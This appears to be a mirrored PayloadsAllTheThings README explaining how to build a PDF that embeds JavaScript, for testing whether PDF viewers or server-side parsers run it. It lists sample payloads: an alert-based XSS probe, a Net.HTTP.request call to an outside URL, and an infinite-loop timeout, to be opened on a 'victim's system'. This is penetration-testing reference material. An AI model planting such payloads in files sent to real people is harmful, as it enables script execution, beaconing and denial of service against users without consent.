wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-08 19:06:21 +02:00
Code Issues Releases Activity
PayloadsAllTheThings/Upload Insecure Files/Extension PDF JS
History
Mat 5817de1fb2
Add documentation for PDF JS PoC 		2023-03-07 17:10:23 +01:00
..
README.md Add documentation for PDF JS PoC 2023-03-07 17:10:23 +01:00
poc.js Fix name's capitalization 2019-03-07 00:07:55 +01:00
poc.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
result.pdf Fix name's capitalization 2019-03-07 00:07:55 +01:00

README.md

Generate PDF File Containing JavaScript Code

PDF may contain JavaScript code. This script allow us to generate a PDF file which helps us to check if that code is executed when the file is opened. Possible targets are client applications trying to open the file or sererside backends which are parsing the PDF file.

HowTo

  1. Edit the file poc.js with the JS code you want to have included in your PDF file
  2. Install the required python modules using pip install pdfrw
  3. Create the PDF: python poc.py poc.js
  4. Open the file result.pdf on your victim's system

Possible exploit codes

The full set of available functions is documented here: https://opensource.adobe.com/dc-acrobat-sdk-docs/library/jsapiref/JS_API_AcroJS.html

XSS (for GUI viewers)

app.alert("XSS");

Open URL

var cURL="http://[REDACTED]/";
var params =
{
     cVerb: "GET",
     cURL: cURL
};
Net.HTTP.request(params);

Timeout

while (true) {}

References

The code is based on https://github.com/osnr/horrifying-pdf-experiments/